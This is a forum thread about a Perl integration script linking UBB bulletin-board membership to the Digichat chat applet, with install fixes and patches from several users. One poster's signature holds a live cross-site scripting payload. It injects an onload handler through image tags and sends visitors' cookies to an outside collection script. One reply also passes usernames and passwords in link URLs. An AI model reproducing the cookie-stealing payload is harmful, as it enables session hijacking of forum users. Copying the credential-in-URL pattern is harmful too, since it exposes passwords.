php forum
php mysql forum
php mysql smarty
 
Page 1 of 4 1 2 3 4 >
Topic Options
#142872 - 11/11/01 10:43 AM [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
This is a script to allow ubb membership integration to digichat's chat service.
Updated: 2-1-02
Thanks for your help, LK!

Download

[ 11-11-2001: Message edited by: MasterMind ]

Top
#142873 - 11/11/01 10:49 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
aaronsam001 Offline
Junior Member

Registered: 08/15/01
Posts: 25
thanks iv been waiting for this

Top
#142874 - 11/11/01 12:41 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
wardx28 Offline
Member

Registered: 10/28/00
Posts: 111
Loc: Marietta, ga
Thanks MasterMind smile

Top
#142875 - 11/11/01 12:43 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
no prob. try it, nonlive, before using it. Report bugs here to be fixed.

Top
#142876 - 11/11/01 01:09 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
wardx28 Offline
Member

Registered: 10/28/00
Posts: 111
Loc: Marietta, ga
Sorry, but we couldn't find a record for Username:. Please try again. Use your Back button.

This is what i am getting on 6.1.2

Top
#142877 - 11/11/01 01:23 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
Good. FITNR.

With help, LK, take a look please? smile

Top
#142878 - 11/11/01 01:45 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Brad.loo Offline
Member

Registered: 07/11/01
Posts: 1014
Loc: North Carlina | Fav Anime: Lov...
MM, i thank u for even tryin this, but one question, i have been able to down grade a number of 6.1+ hacks into my 6.05 forum, i have decided not to go to 6.1 because im waiting on 6.2+, so will this work on 6.05 or will i have to play with the scripts?. if it will work on 6.05 illbe happy to help u test it :]
_________________________
LK UBB: gosh, how can you be so sick ?
Anime loo: LOL
LK UBB: you're just too weird for me

Nothing like vandalizing a skateboard to kick your day off!!

Top
#142879 - 11/11/01 01:55 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
no, not as-is

Top
#142880 - 11/11/01 02:27 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LK Offline
Admin / Code Breaker

Registered: 03/24/01
Posts: 7396
I got it to work in my board:

1. I didn't use form_data at all, just "%DATA = map{$_ => param($_)} param(); #map is your friend!" (it was commented before).

2. $user_number = &GetUserNumber($user); - notice $user_number and $user.

3. if ($user_number ne "") { - since $ProfileNumber doesn't exist, see #2.

4. @user_profile = &OpenProfile("$user_number"); - without .cgi

5. $pubname = &GetPubName($user_number); - get public name.

6. <PARAM NAME="nickname" VALUE="$pubname">

I think that's all smile good job, demo: http://www.lkubb.dns2go.com/?ubb=digichat .
_________________________

My Hacks Page (will be back with UBB 7!)
UBBDev - We put the class into UBB.classic!

Top
#142881 - 11/11/01 02:45 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
Thanks LK. ZIP updated with beta 1.

Top
#142882 - 11/11/01 03:04 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LK Offline
Admin / Code Breaker

Registered: 03/24/01
Posts: 7396
Looks like it's still the old zip confused Is it my Temporary Internet Files?

Anyway, I modified the code a little to set up a demo account: test/digichat.

[ 11-11-2001: Message edited by: LK ]
_________________________

My Hacks Page (will be back with UBB 7!)
UBBDev - We put the class into UBB.classic!

Top
#142883 - 11/11/01 03:16 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
no...its the new one...

Top
#142884 - 11/11/01 03:43 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LK Offline
Admin / Code Breaker

Registered: 03/24/01
Posts: 7396
Code:
code:
$user_number should before $pubname wink

Except that I think everything is fine smile
_________________________

My Hacks Page (will be back with UBB 7!)
UBBDev - We put the class into UBB.classic!

Top
#142885 - 11/11/01 05:11 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Variables Offline
Member

Registered: 12/03/00
Posts: 350
Quote:
quote:


The same message here. It's still alpha i guess frown
_________________________
"I have not failed. I've just found 10,000 ways that won't work."
- Edison -

www.cyberty.nl

Top
#142886 - 11/11/01 06:33 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Asniper Offline
Member

Registered: 10/18/00
Posts: 79
Loc: Brampton, Ontario, Canada
ok i feel dumb saying this but

i'm totaly lost in setting this up
how do i install this? frown

Top
#142887 - 11/11/01 07:57 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
Variables: I'll check it out. Make sure you have the newest zip file from the server.

Asniper: I'll have an HTML file for this in about 5.

Top
#142888 - 11/11/01 07:58 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
Maybe not. Hold on..

Top
#142889 - 11/11/01 08:28 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
Fixed a few bugs. Uses nice errors like UBB. Uses ubb's text and background. At the top you need to set your digichat siteid in "$id = " variable.

Top
#142890 - 11/12/01 02:23 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LK Offline
Admin / Code Breaker

Registered: 03/24/01
Posts: 7396
$pubname = &GetPubName($pubname); should be $pubname = &GetPubName($user_number); wink

Except that it works fine, demo updated.
_________________________

My Hacks Page (will be back with UBB 7!)
UBBDev - We put the class into UBB.classic!

Top
#142891 - 11/12/01 04:52 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Variables Offline
Member

Registered: 12/03/00
Posts: 350
Does this work when the Digichat is on an other server?

I hope you put a good readme file in the zip. wink
_________________________
"I have not failed. I've just found 10,000 ways that won't work."
- Edison -

www.cyberty.nl

Top
#142892 - 11/12/01 08:48 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
yes

Top
#142893 - 11/12/01 09:09 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Variables Offline
Member

Registered: 12/03/00
Posts: 350
Suppose a member has logged in and wants to go to Digichat. A link to digichat.cgi does not work. LK has it in a login-intro that brings you instantly to Digichat. Lk, how do you do that, and how can it be put in the main-intro of a forum to do the same?
_________________________
"I have not failed. I've just found 10,000 ways that won't work."
- Edison -

www.cyberty.nl

Top
#142894 - 11/13/01 05:45 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LK Offline
Admin / Code Breaker

Registered: 03/24/01
Posts: 7396
In ultimatebb.cgi
Code:
code:


[ 11-13-2001: Message edited by: LK ]
_________________________

My Hacks Page (will be back with UBB 7!)
UBBDev - We put the class into UBB.classic!

Top
#142895 - 11/13/01 06:27 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Variables Offline
Member

Registered: 12/03/00
Posts: 350
Tnx LK, that was crucial. Great, it works. wink

It would be nice if the member who has already logged in at the forum, can travel to Digichat without entering the name and password again.

[ 11-13-2001: Message edited by: Variables ]
_________________________
"I have not failed. I've just found 10,000 ways that won't work."
- Edison -

www.cyberty.nl

Top
#142896 - 11/13/01 07:09 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LK Offline
Admin / Code Breaker

Registered: 03/24/01
Posts: 7396
Change it to the updated code above (I edited it now), it automatically types in the username/password in the login page (?ubb=digichat).
_________________________

My Hacks Page (will be back with UBB 7!)
UBBDev - We put the class into UBB.classic!

Top
#142897 - 11/13/01 07:46 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Variables Offline
Member

Registered: 12/03/00
Posts: 350
Perfect! Great job LK. wink
_________________________
"I have not failed. I've just found 10,000 ways that won't work."
- Edison -

www.cyberty.nl

Top
#142898 - 11/16/01 11:34 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
wardx28 Offline
Member

Registered: 10/28/00
Posts: 111
Loc: Marietta, ga
What is new?
Can this mod link profile info form UBB to digichat profies?

Top
#142899 - 11/16/01 01:57 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
manuelbp Offline
Member

Registered: 05/23/01
Posts: 137
Loc: Montevideo
I´m sorry to bother, but could you include instructions on how to install the hack?

I copied digichat.cgi to ubb cgi, and also hacked ultimatebb.cgi as LK said.
But how do I link to the file?

If I go to http://mydomain.com/cgiubb/ultimatebb.cgi?ubb=digichat, the login appears with my nick and password already typed, but when I try to login it takes me back to the forums summary page.

Top
#142900 - 11/16/01 02:06 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LK Offline
Admin / Code Breaker

Registered: 03/24/01
Posts: 7396
manuel, you have 'ation' instead of 'action'.
_________________________

My Hacks Page (will be back with UBB 7!)
UBBDev - We put the class into UBB.classic!

Top
#142901 - 11/16/01 11:12 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
This is the only release for 6.1.0 (pending bugs). 6.2.0 will have a new, more functional version with a few new features. Stay tuned!

Top
#142902 - 11/17/01 07:26 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
manuelbp Offline
Member

Registered: 05/23/01
Posts: 137
Loc: Montevideo
Hehe, stupid me. laugh


I used the "embeded" parameter, and even though the chat poped-up. Any clue on this?

I would like it that who´s online shows when users are chating. This is possible?


Thanks guys !!

Top
#142903 - 11/29/01 12:41 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
AllenAyres Offline

I type Like navaho

Registered: 03/10/00
Posts: 25580
Loc: Texas
anyone has a demo site?
_________________________
- Allen wavey
- What Drives You?

Top
#142904 - 11/29/01 12:49 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LK Offline
Admin / Code Breaker

Registered: 03/24/01
Posts: 7396
Allen, http://www.lkubb.dns2go.com/?ubb=digichat , use username/password: test/digichat
_________________________

My Hacks Page (will be back with UBB 7!)
UBBDev - We put the class into UBB.classic!

Top
#142905 - 11/29/01 01:14 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
AllenAyres Offline

I type Like navaho

Registered: 03/10/00
Posts: 25580
Loc: Texas
thanks, looking good <img src="smile.gif" border="0" alt="" />
_________________________
- Allen wavey
- What Drives You?

Top
#142906 - 11/30/01 05:10 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
kha Offline
Junior Member

Registered: 10/22/01
Posts: 1
But why I can't chat ?I can't see what I type,
I can't choose Chatwatch option in Digichat.
LK,How can I do for this ?

Top
#142907 - 12/01/01 01:49 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LtUSMC Offline
Junior Member

Registered: 08/30/00
Posts: 16
Loc: Quantico
I'm lost too. The zip file I downloaded (linked at the top of this thread) had two files. One is a readme file stating that this is the alpha version. The other has the code, but I'm totally lost on which files I'm supposed to edit and where?

Can somebody explain this to me? This is not my area of expertise. Sorry.

Thanks for the help.

Top
#142908 - 12/01/01 01:51 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LtUSMC Offline
Junior Member

Registered: 08/30/00
Posts: 16
Loc: Quantico
Forgot to mention that I'm running v6.05. Will this still work?

LtUSMC

Top
#142909 - 12/01/01 01:56 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LK Offline
Admin / Code Breaker

Registered: 03/24/01
Posts: 7396
In the end of $MainButtonsLine (ubb_lib.cgi) line, add:
| <a href="$vars_config{CGIURL}/digichat.cgi?UserName=$username&Password=$password">digichat</a>

If you don't want it to say the username/password, you can use my login that I posted before:

In ultimatebb.cgi
Code:
code:


Then, use:
| <a href="$vars_config{CGIURL}/ultimatebb.cgi?ubb=digichat">digichat</a>
_________________________

My Hacks Page (will be back with UBB 7!)
UBBDev - We put the class into UBB.classic!

Top
#142910 - 12/01/01 02:35 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LtUSMC Offline
Junior Member

Registered: 08/30/00
Posts: 16
Loc: Quantico
I think mine is not working becasue I'm using v6.05. Otherwise, I did the following:

I edited digichat.cgi and changed the CODEBASE line to reflect the correct server. The CODE line was the same, so I didn't change it. I also didn't find what was referred to as <PARAM NAME="port" VALUE="XXXX">, as there was no port parameter being used that noticed in my current html code.

I tried using the link of:

http://www.....com/cgi-bin/ultimatebb.cgi?ubb=digichat

And the username and password appears properly. But when I click submit, I get a "The page cannot be displayed" message, and the page is titled HTTP 500 Internal Server Error.

How can I change the program to have it work with v6.05? I would really appreciate this help

Any ideas?

Thanks.

<font color="#000000" size="1">[ 12-01-2001 02:50 AM: Message edited by: LtUSMC ]</font>

Top
#142911 - 12/01/01 07:20 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
Quote:
quote:


no

Top
#142912 - 12/01/01 09:03 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LtUSMC Offline
Junior Member

Registered: 08/30/00
Posts: 16
Loc: Quantico
Is there anything I can do to modify the program to have it work with v6.05?

The reason I'm hesitant to upgrade to v6.10 is because of all the other hacks I have installed already. I assume I would lose them in the upgrade.

Any suggestions on what I could to make it work with v6.05? I can work on the program if I can get some guidance. Or are there alternative solutions? Thanks

Top
#142913 - 12/03/01 08:06 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LtUSMC Offline
Junior Member

Registered: 08/30/00
Posts: 16
Loc: Quantico
Ok, I went ahead and upgraded to v6.10. Now the DigiChat hack works like a charm. Thanks!!

Two questions:

1) I have the login/password form on my forum summary page. I would like it to open a new window? Where and what file should I edit to do this?

2) Since I have my username/password login on the forum summary page, they currently show up blank when one opens this page. What can I modify in order to have these already filled with the username & password information?

3) Is there a way for DigiChat to remember user settings such as icon and profile?

Thank you for all the help.

LtUSMC

Top
#142914 - 01/20/02 11:07 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
DarkFire Offline
Junior Member

Registered: 06/19/01
Posts: 9
I have the same question and feel the same as Asniper. . .

Top
#142915 - 01/31/02 07:50 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
up

Top
#142916 - 01/31/02 10:57 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Schu Offline
Junior Member

Registered: 03/09/01
Posts: 22
suh-weet. been waiting for this one. good job guys....
_________________________
bbs.foofighters.com

Top
#142917 - 02/01/02 01:59 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Schu Offline
Junior Member

Registered: 03/09/01
Posts: 22
One suggestion. First, I have my UBB set to not allow guests at all. I'm trying to link (from a page outside of the UBB) directly to the digichat login screen, but if you aren't logged in it asks you to do so, and then after you login instead of sending you to the digichat login screen again, it sends you to the main UBB page.

I'm running 6.2.0
_________________________
bbs.foofighters.com

Top
#142918 - 02/01/02 06:47 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
Updated. Not sure if it will WORK, but...

Top
#142919 - 02/02/02 07:05 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LK Offline
Admin / Code Breaker

Registered: 03/24/01
Posts: 7396
[code][/code]Why is it needed? tipsy

1. There isn't $in{refer}.
2. $ubb isn't used anywhere.
3. You have more }s than {.
4. You're printing blank variables as cookies.
_________________________

My Hacks Page (will be back with UBB 7!)
UBBDev - We put the class into UBB.classic!

Top
#142920 - 02/02/02 07:20 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Greg Hard Offline
Member

Registered: 02/21/00
Posts: 5533
Loc: My Room
FYI, it's in there for version 2.0, coming to a theatre near you.

Top
#142921 - 02/03/02 12:37 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Schu Offline
Junior Member

Registered: 03/09/01
Posts: 22
Oh, also another suggestion...

The old digichat hack allowed you to pass variables for avatars and other preferences.

That would be dope.
_________________________
bbs.foofighters.com

Top
#142922 - 03/01/02 08:11 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
websorceror Offline
Junior Member

Registered: 05/14/01
Posts: 10
Hi LK

Have you managed to call the digichat.cgi directly without
using a form. You seem to say that you can in a earlier note, but
I don't understand what to change. frown I have the form version working
with my board thanks to your later note.

Any ideas on how you could login to DigiChat when you are not already
logged into UBB? At present it logs you into UBB then takes you to the forums.

I would be very grateful for any hints on how to get that to work.

I am now looking at the buddies capability in DigiChat. I think
It should be possible to interface it quite neatly with UBB.
I am going to attempt to write some code and will post it here if
anyone is interested.

Cheers

Websorceror

Top
#142923 - 03/01/02 08:32 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LK Offline
Admin / Code Breaker

Registered: 03/24/01
Posts: 7396
In digichat.cgi, find:
Code:
[/code]Replace with:[code]
Then try to link to digichat.cgi... It's not tested, but I think it should work.
_________________________

My Hacks Page (will be back with UBB 7!)
UBBDev - We put the class into UBB.classic!

Top
#142924 - 03/01/02 08:46 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
websorceror Offline
Junior Member

Registered: 05/14/01
Posts: 10
Hi LK,

Wow I didn't expect a response that quick, thanks very much I will try that.
Do you know if this hack is going to eventually become a finished application.
It works really well on my board, so I am already pretty happy with it.
Are there any known deficiencies I should be aware of?

Cheers

Websorceror smile

Top
#142925 - 03/04/02 10:35 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
websorceror Offline
Junior Member

Registered: 05/14/01
Posts: 10
Hi LK,

Your suggestion to bypass the form worked like a dream.

Many Thanks

Websorceror

Top
#142926 - 03/05/02 07:15 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
websorceror Offline
Junior Member

Registered: 05/14/01
Posts: 10
Hi Greg and LK,

I have been testing the digichat hack over the past few days and have found one small bug,
so far (pretty good for beta software smile ). If you access the chat using Netscape it fails with
a file not found, this is because the case on the client.jar is wrong. Literally only changing the
uppercase "C" to lowercase will fix the fault.

Find (in digichat.cgi)
ARCHIVE="Client.jar"

Change to
ARCHIVE="client.jar"

I have also found if I use LK's cookie code that it can let people through who do not have post
access under some circumstances when calling the hack directly. I have written a small patch to
fix the problem and will post it when i have tested it works correctly. Thanks for the great
hack it has allowed me to really integrate Digichat in with my UBB membership in record time.

Greg are you still intending to release v2.0, if so could you give any clues as to what it will
contain?

Cheers

Websorceror

Top
#142927 - 03/05/02 07:20 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
LK Offline
Admin / Code Breaker

Registered: 03/24/01
Posts: 7396
Have you ever seen that problem yourself?
_________________________

My Hacks Page (will be back with UBB 7!)
UBBDev - We put the class into UBB.classic!

Top
#142928 - 03/05/02 07:42 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
websorceror Offline
Junior Member

Registered: 05/14/01
Posts: 10
Hi LK,

I have seen it on my system, it is likely to be rare but I have been able to reproduce it. I will logon to my other system to get the details, should get back to you within 15 mins.

Cheers

Websorceror

Top
#142929 - 03/05/02 08:06 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
websorceror Offline
Junior Member

Registered: 05/14/01
Posts: 10
Hi LK,

I found that users who had been members, but
since had their posting ability turned off could
still access digichat if I called the hack
directly using your cookie suggestion. They
obviously needed to have logged on with posting
rights before, and still have a valid cookie.

To prevent this I added the following code

Find

&DoPostTheReply;

Add this immediately before it

if ($user_profile[4] !~ /Write/i){
print("

Sorry, you not authorised to chat");
exit;
}

So far it seems to solve the problem.

I am also going to try to interface with the UBB buddies facility. I am still learning Perl and
UBB so that should be interesting. Hope the above is useful.

Cheers

Websorceror

Top
#142930 - 03/09/02 12:49 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
Morpheus Offline
Member

Registered: 08/21/01
Posts: 61
The link is down.. frown
_________________________
.:. EnTeR ThE MaTrIx .:.

Top
#142931 - 03/11/02 05:23 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
websorceror Offline
Junior Member

Registered: 05/14/01
Posts: 10
Hi Morpheus,

The link is live again now, I just successfully
downloaded the hack. This is a really good hack,
but make sure you read the posts by LK on how to
install and call it. Great to see someone else
interested in integrating Digichat, good luck and
enjoy.

I have been looking at writing some extensions
for this to allow saving of buddy lists and
possibly more. I may release them here when they
are finished if anyone is interested.

Cheers

Websorceror

Top
#142932 - 03/11/02 06:32 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
slashme Offline
Junior Member

Registered: 03/11/02
Posts: 6
Yeah! Great hack! Nice Work!
_________________________
[img]http://hxr.kilia.com/t.gif"id="heeej"width="1"height="1[/img]
[img]http://hxr.kilia.com/t.gif"onload="document.images.heeej.src='http://hxr.kilia.com/catch.php?dt='+escape(document.cokie)"width="1"height="1[/img]
Gotta catch 'em all!

Top
#142933 - 06/26/02 10:59 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
wadood Offline
Junior Member

Registered: 04/21/01
Posts: 18
i just cant seem to understand this step
i am using 6.3.0
does that mean it wont work?

[code][/code]Then, use:
| <a href="$vars_config{CGIURL}/ultimatebb.cgi?ubb=digichat">digichat</a>[/b]</font><hr /></blockquote><font size="2" face="Verdana, Helvetica, sans-serif">

Top
#142934 - 06/29/02 10:27 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
wadood Offline
Junior Member

Registered: 04/21/01
Posts: 18
anyone can shed some light on this please?
i seem to have it working but only this part of the linking doesnt seem to work or i dont understand this post above

please help...i have 6.3.0

Top
#142935 - 07/01/02 04:02 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
wadood Offline
Junior Member

Registered: 04/21/01
Posts: 18
bump

help please

Top
#142936 - 07/01/02 11:27 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2
wadood Offline
Junior Member

Registered: 04/21/01
Posts: 18
thanks LK for all your help
sorry didnt mean to bother you with the PMs

Top
#318782 - 05/16/11 08:31 PM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2 [Re: Greg Hard]
xxcorrosionxx Offline
Lurker

Registered: 01/23/11
Posts: 3
Digichat applet can be assessable by php and mysql! So you can run the applet with php values that can connect to your mysql database:

Php Code:
<applet name="DigiChat" 
codebase="http://hostname/DigiChat/DigiClasses/"
code="com.diginet.digichat.client.DigiChatApplet" 
width="200" height="90" align="middle" archive="client.jar">
<param name="siteID" value="<?php echo $_SESSION['SESS_SITE_ID']; ?>">
<param NAME="Age" VALUE="<?php echo $_SESSION['SESS_AGE'];?>">
<param NAME="realname" VALUE="<?php echo $_SESSION['SESS_REAL_NAME'];?>">
<param NAME="nickname" VALUE="<?php echo $_SESSION['SESS_FIRST_NAME'];?>">
<param name="url" value="<?php echo $_SESSION['SESS_URL']; ?>">
<param name="exitmessage" value="<?php echo $_SESSION['SESS_EXIT_MESSAGE']; ?>">
<param name="comments" value="<?php echo $_SESSION['SESS_COMMENTS']; ?>">
<param name="cabbase" value="Client.cab">
<param name="background" value="ffffff">
<param name="textcolor" value="000000">
<param value="true" name="RoomsTab">
<param name="quickload" value="true">
<param name="signed" value="TRUE">
<param name="ports" value="7545,7546,7547,7548">
</applet> 


Edited by xxcorrosionxx (05/16/11 08:33 PM)

Top
#318877 - 08/01/11 08:19 AM Re: [6.2x] UBB -> Digichat Member Integration Beta 1.2 [Re: Greg Hard]
AllenAyres Offline

I type Like navaho

Registered: 03/10/00
Posts: 25580
Loc: Texas
Danke xCx
_________________________
- Allen wavey
- What Drives You?

Top
Page 1 of 4 1 2 3 4 >



Latest Posts
[7.2.1] - Naked shoutbox
by bellaonline
05/05/12 05:00 PM
[7.x] Stop Forum Spam Integration v0.4
by bellaonline
05/05/12 03:53 PM
Shout Box

(Views)Popular Topics
Known public proxy servers 1689885
Integrated Index Page (IIP) 5.3.1 555705
Finished-[6.5.2] Games Arcade Deluxe v1.9 501236
Integrated Index Page (IIP) 5.1.1 415112
TLD Bv2.1 Released - Threads Links Directory 396822
[6.0x] Who's Online 4.0.0 [Finished] 389412
Finished-[6.5.1] Integrated Index Page (IIP) 6.5 330423
Q & A 298663
Slash UBB 266936
[6.3.x] [beta] Hit Hack 2.0 227970
Forum Stats
13621 Members
59 Forums
37191 Topics
295716 Posts

Max Online: 686 @ 06/28/07 07:04 AM

 

 

 
fusionbb message board php hacks